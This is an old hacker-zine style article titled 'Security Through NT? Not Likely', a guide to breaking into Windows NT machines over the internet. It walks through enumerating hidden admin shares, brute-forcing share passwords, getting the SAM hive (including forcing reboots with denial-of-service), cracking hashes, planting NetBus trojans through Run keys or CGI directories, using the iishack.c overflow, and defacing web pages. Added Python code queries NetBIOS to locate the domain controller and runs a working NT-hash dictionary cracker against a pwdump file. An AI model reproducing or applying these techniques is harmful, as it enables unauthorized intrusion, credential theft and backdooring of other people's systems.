Security Through NT?  Not Likely

by Kurruppt2k

For quite some time, hacking has meant knowing a decent amount about UNIX, or, for you old-school hackers, VMS, TSO, or whatever.  Maybe you would have to know a tad about NetWare, but that was as far into the PC world as you cared to delve.

Well, it's 2000 now, and Microsoft is getting its foot into the World Wide Web, meaning the percentage of Windows NT machines on the net is increasing.  A lot.  Now, many of you UNIX-only hackers refuse to even glance in the direction of a Windows box, but Windows NT is only going to get bigger as time goes on, not to mention Windows 2000 (Active Directory... ooh!).  And what if the web page you want to deface happens to be sitting on a Windows NT server?  You're just going to have to suck it in and learn to break into Windows NT machines too.

My least favorite thing about Windows is how few network services it exposes.  A default NT box listens on far fewer ports than a UNIX box, which means fewer daemons to play with, which means fewer points of entry.  And if you search the exploit archives for Windows NT stuff, you won't find much besides denial-of-service (DoS) exploits and stuff that needs to be executed locally on the Windows NT LAN.

All of a sudden your ocean of UNIX hacking techniques is about 10 percent applicable in the Windows NT world.  For starters, Windows NT is a NOS (network operating system), meaning a client/server environment.  If you Telnet to a UNIX machine and execute a command, your request is processed on that machine, using its resources.  If you map a share from a Windows box and launch a program from it, the executable is pulled across the wire and runs on your computer, using your resources, and if it's a command that reports system information, it gives you info on your own computer.  So how do you get commands to run on your target Windows machine?  Suddenly these Windows NT machines seem untouchable.  Not true.

How to hack a Windows NT box all depends on what exactly your goal is.  With UNIX, you're usually looking to get a root shell.  As I'm sure you know, NT doesn't ship with a Telnet daemon, so you can't just get a "shell" on a remote Windows NT box.  Windows NT is set up to share resources - files, applications, printers, you get the idea.  Meaning each workstation in its network exists as an entity in itself (vs. dumb terminals logging into a huge UNIX machine), and if it needs something from a server, it connects via NetBIOS (SMB over NetBIOS, TCP port 139).  In Windows Networking, this means mapping a logical network drive to a particular share.

Microsoft Networking

Shares.  The heart of Windows networks.

A share is just like a volume in NetWare - a directory set up to be accessed by authorized persons/workstations inside the network/internetwork.  Shares can use either share-level security or user-level security.  Share-level security means that the resource is protected by a single password, and anyone knowing that password can access the share; this is how Windows 9x shares work.  User-level security is more UNIX-ish, in that your permissions to a particular share depend on who you are logged in as; NT shares are always user-level.  Now, this entire article refers to breaking into Windows NT over the Internet, so logging in isn't feasible (though it is possible, see the "Elite Tactics" below).

If port 139 is open though (which it almost always is on a Windows NT server, and oftentimes is on NT Workstation and Windows 9x), you can use Client for Microsoft Networks to connect to it.

First make sure you have the client installed - go to Control Panel, then Network (you also need TCP/IP with NetBIOS over TCP/IP enabled; NetBEUI isn't routable, so it's no use across the Internet).  All the work is done with the net command from a command prompt.  Once you find your target NT machine and see an open port 139, your first step is to find out if there are any open shares.

To find out, type this at a command prompt:

C:\> net view \\[IP address]

If you get an error message, it probably means that the computer you attempted to connect to had no browsable shares (or possibly that you don't have Windows Networking set up correctly on your machine, so check!).  If shares exist, you will see a list of them, including the share name, share type (disk, printer, etc.), and any comments the sysadmin wanted to mention.  For more NetBIOS information on this machine (its NetBIOS names, its domain or workgroup, and whether it's a domain controller), use nbtstat -A [IP address].  If you see no open shares, there is still a possibility of hidden shares: net view only lists what the server chooses to advertise, and any share whose name ends in $ is left off the list.

Common hidden share names include:

  • ADMIN$  (the system directory, %SystemRoot% - can you say "root shell?" - though it only opens for an account in the Administrators group)
  • C$, D$, etc.  (the root of each local drive, again administrators only)
  • IPC$  (the inter-process communication share; connecting to it with an empty username and empty password is a "null session," which is what the enumeration tools below rely on)

Note that the *SMBSERVER name you'll see in Samba and NT documentation is not a share at all: it's the generic NetBIOS "called name" a client can use on port 139 when it doesn't know the server's real NetBIOS name.

To connect to any share, visible or hidden, you use the net use command, in the following fashion:

C:\> net use i: \\[IP address]\[share name]

To check for hidden shares, just try to connect to the names given above, or any others you can think of.

If it exists, you'll connect.  Once you receive the "The command was completed successfully" message, you are connected to the NT machine.

Logical drive I: (or whatever drive letter you assigned) now becomes that share - you've mapped a network drive to it.  This is similar to mounting remote filesystems in UNIX.

So to see what you've connected to, change to drive I: and issue a dir.  You can now use any DOS commands to explore the share.  The share, however, may be password protected.  You may be prompted for a password right after issuing a net use, or after connecting when trying to browse the filesystem.

Password guessing (see the wordlist tools below) can be used to defeat this.  If, however, you get a message that you do not have privileges to that resource (or "access denied"), this means that the share is user-level and whatever credentials you offered weren't good enough; net use takes a password and a /user:[name] argument after the share name, but without a valid account on that machine you won't be able to access the share.

Once in, you will have either "read" permissions, meaning you can look at or execute (launch into your RAM) a file, or "read/write," meaning you can edit any file as well.  To check, make a file and delete it.  Create a directory and remove it (rmdir /s on NT; deltree is a DOS/9x command).
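The nbtstat step mentioned above is worth seeing at the packet level, because the node status reply is what tells you which box is the PDC before you go after it.  The following is an added example, not part of the original article: it builds the RFC 1002 node status request that nbtstat -A sends to UDP port 137, and parses the reply into a name table.  The reply it parses is constructed for the example (a made-up host TARGET in a made-up domain CORP, with a MAC from the documentation range); the helper names (find_pdc, serves_files, nbtstat) are mine.

```python
"""NetBIOS node status query (what nbtstat -A does), built and parsed by hand.

RFC 1002 NBSTAT request and response.  SAMPLE_RESPONSE is constructed for
the example, not a capture from any real host.
"""
import socket
import struct

NBSTAT = 0x0021                  # resource record type for a node status query
NB_PORT = 137
WILDCARD = b"*" + b"\x00" * 15   # the "*" name: '*' padded with NULs to 16 bytes

# Meaning of the 16th byte (the "suffix") of a NetBIOS name.
SUFFIXES = {
    0x00: "workstation service / domain name",
    0x03: "messenger service",
    0x1B: "domain master browser (the PDC)",
    0x1C: "domain controllers group",
    0x1D: "master browser",
    0x20: "file server service (shares on port 139)",
}


def encode_name(name16: bytes) -> bytes:
    """RFC 1001 first-level encoding: each nibble becomes one letter 'A'..'P'."""
    assert len(name16) == 16
    out = bytearray()
    for b in name16:
        out.append(ord("A") + (b >> 4))
        out.append(ord("A") + (b & 0x0F))
    return bytes(out)


def build_node_status_request(trn_id: int = 0x1234) -> bytes:
    """Header (ID, flags=0, QDCOUNT=1) plus one question for '*' of type NBSTAT."""
    header = struct.pack(">HHHHHH", trn_id, 0x0000, 1, 0, 0, 0)
    question = b"\x20" + encode_name(WILDCARD) + b"\x00" + struct.pack(">HH", NBSTAT, 1)
    return header + question


def parse_node_status_response(pkt: bytes) -> dict:
    """Pull the name table and the adapter MAC (UNIT_ID) out of an NBSTAT answer."""
    trn_id, _flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if ancount < 1:
        raise ValueError("no answer record in response")
    off = 12
    while pkt[off] != 0:             # skip the length-prefixed RR name labels
        off += 1 + pkt[off]
    off += 1
    rr_type, _cls, _ttl, _rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    if rr_type != NBSTAT:
        raise ValueError("not a node status record")
    num_names = pkt[off]
    off += 1
    names = []
    for _ in range(num_names):       # 15-byte name, suffix byte, 2 flag bytes
        raw, suffix = pkt[off:off + 15], pkt[off + 15]
        (nflags,) = struct.unpack(">H", pkt[off + 16:off + 18])
        off += 18
        names.append({
            "name": raw.decode("ascii", "replace").rstrip(),
            "suffix": suffix,
            "group": bool(nflags & 0x8000),   # G bit: group name rather than unique
            "active": bool(nflags & 0x0400),  # ACT bit
            "meaning": SUFFIXES.get(suffix, "unknown"),
        })
    mac = ":".join(f"{b:02x}" for b in pkt[off:off + 6])
    return {"trn_id": trn_id, "names": names, "mac": mac}


def find_pdc(names: list):
    """The unique <1B> name is registered only by the domain master browser,
    which on NT is the PDC.  Returns the domain name, or None."""
    for n in names:
        if n["suffix"] == 0x1B and not n["group"]:
            return n["name"]
    return None


def serves_files(names: list) -> bool:
    """An active <20> name means the file server service (port 139 shares) is up."""
    return any(n["suffix"] == 0x20 and n["active"] for n in names)


def nbtstat(ip: str, timeout: float = 2.0) -> dict:
    """Send the real query to a host (only for machines you are allowed to test)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (ip, NB_PORT))
        data, _ = s.recvfrom(2048)
    return parse_node_status_response(data)


def _entry(name: str, suffix: int, flags: int) -> bytes:
    return name.encode("ascii").ljust(15) + bytes([suffix]) + struct.pack(">H", flags)


# Constructed reply: a PDC named TARGET in domain CORP that also serves files.
_RDATA = (
    bytes([5])
    + _entry("TARGET", 0x00, 0x0400)   # unique, active
    + _entry("TARGET", 0x20, 0x0400)
    + _entry("CORP", 0x00, 0x8400)     # group (0x8000) + active
    + _entry("CORP", 0x1C, 0x8400)
    + _entry("CORP", 0x1B, 0x0400)
    + bytes.fromhex("00005e005301")    # UNIT_ID: adapter MAC (documentation range)
    + b"\x00" * 40                     # remaining statistics counters, zeroed
)
SAMPLE_RESPONSE = (
    struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)
    + b"\x20" + encode_name(WILDCARD) + b"\x00"
    + struct.pack(">HHIH", NBSTAT, 1, 0, len(_RDATA))
    + _RDATA
)

if __name__ == "__main__":
    reply = parse_node_status_response(SAMPLE_RESPONSE)
    for n in reply["names"]:
        kind = "GROUP " if n["group"] else "UNIQUE"
        print(f"{n['name']:<16}<{n['suffix']:02X}>  {kind}  {n['meaning']}")
    print("MAC:", reply["mac"], " PDC of:", find_pdc(reply["names"]))
```

Everything runs offline against SAMPLE_RESPONSE; nbtstat(ip) sends the real query if you want to try it against a host of your own.  The encoded wildcard name that comes out of build_node_status_request is the familiar CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA string you'll recognize from packet dumps.  A unique <1B> entry is the PDC, and an active <20> entry means the net view and net use steps above apply.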

Utilities

Here I will outline a few useful tools you should have when planning to break into an NT box.

Legion v2.1 is a Windows share scanner - it will automate doing net view commands on an entire subnet (or multiple subnets).  Launch it, sit back, and watch as it combs networks for open shares.  If you prefer doing everything from UNIX, WinHack Gold will do the same thing.

NAT (NetBIOS Auditing Tool) is a great program by the makers of Legion.  It will attempt to connect to any open share you specify, attacking with passwords you provide in a wordlist.  It also looks for hidden shares.

L0phtCrack is an NT password cracker.  Getting NT passwords can be tricky - see the "Password Cracking" section.

And finally, AGENT SMITH.  This program will essentially brute-force the hell out of your target, and log all responses to a file of your choice.  Oftentimes this will be your only way to break through password protection on your share.  All four of these programs are available at The CyberUnderground.

Password Cracking

All the hashes reside in the Security Account Manager (SAM) hive of the registry, which lives on disk as %SystemRoot%\system32\config\SAM.  Each account carries two of them: the LanMan (LM) hash, which is the weak one, and the NT hash, an unsalted MD4 of the Unicode password.

To get the hive, you have a few options.  If you're running Windows NT yourself, you can install L0phtCrack and attempt a Remote Registry Dump.  If the machine you're targeting allows remote registry access to the account you're using, you will have the entire SAM hive imported into L0phtCrack.

Most often, though, this doesn't work.  You could always dump the hashes out of the running system with a tool like pwdump and feed its output to your cracker.  But that needs administrator rights on the box (not to mention you'd have to upload software to do it).

So you may have to resort to going after the SAM hive stored on the hard disk of the machine (or any other Domain Controller on the network).  The live hive is %SystemRoot%\system32\config\SAM; the backup copy NT keeps for the Emergency Repair Disk is the file you are looking for: sam._

The problem is that NT keeps the live SAM file open and locked the whole time NT is running, so nothing can read it.  To get it, you'll have to boot the computer to an alternate OS (Linux, DOS, etc.) and get it that way.  Another problem is that the hive is usually on an NTFS partition.  DOS only understands FAT, so you'll need a program to access the alien partition (such as NTFSDOS); Linux has a read-only NTFS driver in the kernel.  Installing another OS onto the remote machine will most likely be tough, as will forcing it to reboot, though programs exist that will do it.  If nothing else, try a denial-of-service attack to force it into rebooting.

So before you devise a vile plan to put DOS 6.22 and DOSREBOOT.EXE onto your target, and change the BOOT.INI, look around for backup copies of sam._.  It's not unheard of to find a copy in %SystemRoot%\repair (C:\WinNT\repair on a default install): rdisk /s writes a fresh one there every time the admin updates the repair disk, and unlike the live hive it isn't locked.  The backup is compressed, so run expand on it (expand sam._ sam) before feeding it to your cracker.  Also, if you prefer to crack passwords with UNIX, you'll have to convert the hive to a UNIX-style password file (cut-and-paste the hashes into pwdump format, one user:RID:LMhash:NThash::: line per account).
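What actually sits in those hashes, and what "cut-and-paste the hashes" means in practice, is easier to see in code.  The following is an added example, not from the original article and not L0phtCrack's code: it implements the NT hash (MD4 of the UTF-16LE password, per RFC 1320, with no salt) and runs a wordlist against a pwdump-format dump.  The dump, the wordlist and the account names are constructed for the example, and the function names are mine.  The LM hash needs DES and is left out.

```python
"""NT hash (MD4 over UTF-16LE) and a dictionary attack on a pwdump-style dump.

MD4 is written out in full (RFC 1320) so the example has no dependencies.
SAMPLE_DUMP and WORDLIST are constructed for the example.
"""
import struct

_M = 0xFFFFFFFF
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three rounds of 16 steps over each 64-byte block."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)     # pad to 56 mod 64
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    F = lambda x, y, z: (x & y) | (~x & _M & z)       # round 1: select
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)   # round 2: majority
    H = lambda x, y, z: x ^ y ^ z                     # round 3: parity
    r2_idx = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):
            a = _rotl((a + F(b, c, d) + X[i]) & _M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + G(b, c, d) + X[r2_idx[i]] + 0x5A827999) & _M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + H(b, c, d) + X[r3_idx[i]] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & _M, (b0 + b) & _M, (c0 + c) & _M, (d0 + d) & _M
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """The NT hash: MD4 of the password as UTF-16LE.  No salt, case preserved."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """user:RID:LMhash:NThash::: lines, the format pwdump and L0phtCrack use."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        accounts.append({"user": fields[0], "rid": int(fields[1]),
                         "lm": fields[2].lower(), "nt": fields[3].lower()})
    return accounts


def triage(accounts: list) -> dict:
    """RID 500 is Administrator no matter what it has been renamed to.  An LM
    field equal to LM_EMPTY means there is no LM hash to attack (blank
    password, more than 14 characters, or LM storage disabled)."""
    return {
        "administrator": next((a["user"] for a in accounts if a["rid"] == 500), None),
        "no_lm_hash": [a["user"] for a in accounts if a["lm"] == LM_EMPTY],
    }


def crack_nt(accounts: list, wordlist: list) -> dict:
    """Hash the wordlist once (no salt, so one table serves every account),
    then look each account's NT hash up in it."""
    table = {NT_EMPTY: ""}
    for word in wordlist:
        table.setdefault(nt_hash(word), word)
    return {a["user"]: table[a["nt"]] for a in accounts if a["nt"] in table}


# Constructed sample dump: Administrator renamed to "root"; webmaster has a
# password over 14 characters (no LM hash) and an NT hash that is a placeholder.
SAMPLE_DUMP = """\
# constructed sample, not a real dump
root:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
webmaster:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""
WORDLIST = ["letmein", "password", "secret", "changeme"]

if __name__ == "__main__":
    accts = parse_pwdump(SAMPLE_DUMP)
    print("triage:", triage(accts))
    print("cracked:", crack_nt(accts, WORDLIST))
```

Two things show up in the output that matter for the FTP section later: RID 500 is still the Administrator after it has been renamed, and Guest with an NT hash of NT_EMPTY has a blank password.  Because nothing is salted, each candidate word is hashed exactly once however many accounts the dump holds, which is why a wordlist run against a whole domain's SAM is cheap.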

FTP

The closest thing a hacker can do to Telnet into an NT machine is connecting via FTP (the FTP service that comes with IIS authenticates against the NT account database).  The problem is that just because an account exists on the machine doesn't mean that it's allowed FTP access.  So get the password hashes, crack them, and try to FTP in with every one of them.

If the sysadmin thinks he's smart, he'll rename the Administrator (root) account (its RID, 500, never changes, so it still stands out in a hash dump).  Either way, if you crack the password, you'll have FTP access with administrative privileges.  You can now deface web pages, get more passwords for other computers on the network, upload Trojans, etc.  Here's a trick: run Event Viewer (eventvwr.exe) on your own NT box and point it at the target with Log, Select Computer, using the administrator credentials you cracked.  You now have access to all logs on that machine (remember from above that copying the program to a share and launching it from there would only run it on your computer anyway; it's the remote connection that matters, not where the binary lives).

Elite Tactics

Okay, let's pretend you have FTP access.

The problem is, you can't execute programs or do anything else that's any fun.  The answer - a Trojan.  Get one that allows you complete filesystem access, allows for screenshots of your target computer, and lets you open and kill active windows (NetBus does all of this).  But how do you run the Trojan once you upload it?

You have a few options.  Put it somewhere that runs at boot - the Startup folder, or the Run key in the registry (HKLM\Software\Microsoft\Windows\CurrentVersion\Run) - and force it into rebooting (possibly with a DoS attack), or just wait until someone reboots it.  AUTOEXEC.BAT is ignored by NT at boot, and AUTOEXEC.NT only runs when someone starts a DOS program, so neither is a reliable place for it.

Another ploy, if the machine is a web server: upload the Trojan into a CGI directory (cgi-win, cgi-dos, cgi-shl, etc.), then request the Trojan with a browser.  If you state the path correctly, the web service will spawn (launch) the Trojan for you.  Now just connect with your client, and you have complete control of the computer.

Here's another scenario.  Let's say you want to hack their web page.  You have a few passwords, but the FTP service has been disabled.  Well, if the web pages reside in a share (unlikely) you can map it and edit the default.htm or index.html file from the command prompt.

Otherwise, you can always use HTTP to upload your file.  Netscape and Internet Explorer both have clients to upload HTML files via HTTP - just use the usernames and passwords you cracked.  Network sniffers can also be put into place.  L0phtCrack comes with SMB Packet Capture, a decent sniffer.  Search the Net for other NT, Ethernet, or Token Ring sniffers.  The point here is that if there is even one Windows 9x machine on the network, it authenticates with the weak LanMan challenge/response (and sends the password in cleartext only if the server asks for it that way), so a sniffer that captures the exchange hands L0phtCrack something it can crack in short order.  There are also a huge variety of exploits for NT.  The trick is weeding through the DoS exploits and the local ones.

One remote exploit, iishack.c (www.eeye.com), uses a buffer overflow in IIS 4.0's handling of .htr requests (ism.dll) to make the web server itself fetch any file you name over HTTP (in your case, a Trojan) and run it.  IIS ships with NT Server, and IIS 4.0 comes with the Option Pack.  Even if the machine in question isn't a web server, it probably has IIS installed.  One popular web server for NT is O'Reilly's WebSite Pro, which has a vulnerability in its packaged CGI executables.  Specifically, uploader.exe allows you to upload files to the computer - without passwords.

Now, when I said that you can't log on to an NT server over the Internet, that was partially wrong.  The only way to log into an NT domain is to have an account in it.  So you'll have to get yourself one.  How?  Hack the Primary Domain Controller (PDC) or a Backup Domain Controller (BDC), which is where the domain's account database lives.  Now, chances are if you've gotten far enough "in" to add accounts to the domain, you probably have all the permissions you could ever want.  If not, launch the program called User Manager for Domains and add yourself an account (domain membership is a matter of accounts, not IP addresses, so any machine that can reach the domain controller can then log on with it).

In Summary

All in all, NT is a very different environment than UNIX or VMS.

It also demands very different skills and techniques to hack.  Doing so is just as rewarding as breaking into a SPARCstation, and will provide you with all kinds of new and useful information.  This is, after all, why we do what we do.
